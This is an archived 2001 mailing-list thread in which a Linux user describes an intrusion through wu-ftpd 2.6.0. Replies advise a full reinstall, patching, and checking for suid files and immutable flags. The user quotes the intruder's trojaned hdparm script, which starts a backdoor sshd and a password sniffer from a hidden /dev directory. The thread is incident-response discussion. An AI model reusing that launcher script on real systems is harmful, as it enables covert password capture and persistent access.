Re: ftp was hacked
From: Ed Turner (netguru1001@yahoo.com)Date: 12/30/01
- Next message: gaius.petronius: "understanding chkrootkit: sshd section"
- Previous message: Ed Turner: "Re: ftp was hacked"
- In reply to: Bill Unruh: "Re: ftp was hacked"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: Ed Turner <netguru1001@yahoo.com> Date: Sun, 30 Dec 2001 04:33:33 GMT
There was an advisory on WU-FTPd. The program has a serious flaw. Most people who care about this have already
switch to other FTP daemons. Right now I wouldn't trust WU-FTPd.
Ed Turner
Chicago, IL
Bill Unruh wrote:
> In <Pine.LNX.4.43.0112281603150.13038-100000@styx.darbonne.com> "R.A.Wilson" <bud@styx.darbonne.com> writes:
>
> ]Hi -
> ]I have some info to pass along, and a question...
>
> ]A cracker exploited a hole in wu-ftp 2.6.0 and managed to install
> ]a sniffer and a port scanner on my machine. I use slackware, 2.2.16
>
> ]The only reason I found out is that a sharp Linux administrator noted
> ]port scans coming from my machine and wanted to know what was going on.
> ]I looked like the bad guy.
>
> ]After a lot of work, I found the intruder had made a directory where
> ]he put his sniffer log and other programs. He had them set up in:
> ] /dev/ida/.inet
> ]I don't believe that's a legitimate diretory.
>
> ]When I looked at a file called tcp.log, in that directory, I was
> ]stunned to see he had plain text passwords of all the users on my
> ]machine. I couldn't pull the plug fast enough!
>
> ]He also had managed to put an illegal account in /etc/passwd. He used
> ]the account name www. I found files belonging to www and rm'd them.
> ]I also took him out of the passwd file. I updated wu-ftp to the latest
> ]version of 2.6.2 and thought that solved the problem.
>
> ]A few days later I wanted to install a later version of hdparm. I was
> ]using version 3.9 and 4.6 was out. I did a 'locate hdparm' and found
> ]two of them: one in /use/bin/hdparm and the other in /use/sbin.hdparm.
> ]Which was correct? I did 'which hdparm' and found the one in /usr/sbin
> ]was it. it was also a binary file. Curious, I looked at the other one.
> ]This is what it looked like:
>
> ] #!/bin/sh
> ] cd /dev/ida/.inet
> ] ./sshdu -f ./s
> ] ./linsniffer >> ./tcp.log &
> ] cd /
>
> ]So, just by a lucky accident I had discovered the intruder's script to
> ]call his sniffer.
>
> ]I tried to move the file. I tried to edit the file. I tried to remove
> ]it. Nothing. Root cannot touch it! Here's the system message I get
> ]when I try any of the above...
>
> ] cannot unlink 'hdparm': Operation not permitted.
>
> ]Now my question... HOW THE HELL DO I GET RID OF THIS GARBAGE???
>
> ] -Roy Wilson-
> ]===================================================================
>
> What you do is to backup all of your users files and then you wipe the
> disk and reinstall, making sure that you install all of the security
> patches. Then you replace the backup material that you need. Then you
> scan all of that backed up material for suid files and get rid of them.
> eg
> find /home -perm +6000 -ls
>
> PS In answer to your question, read
> man chattr, especially the -i flag.
>
> But as you have discovered the chances of your finding all of the
> backdoors he has installed are nill.
> So do not try. Just reinstall, and remmember to keep up with security
> patches. That hole was patched about a year ago.
- Next message: gaius.petronius: "understanding chkrootkit: sshd section"
- Previous message: Ed Turner: "Re: ftp was hacked"
- In reply to: Bill Unruh: "Re: ftp was hacked"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
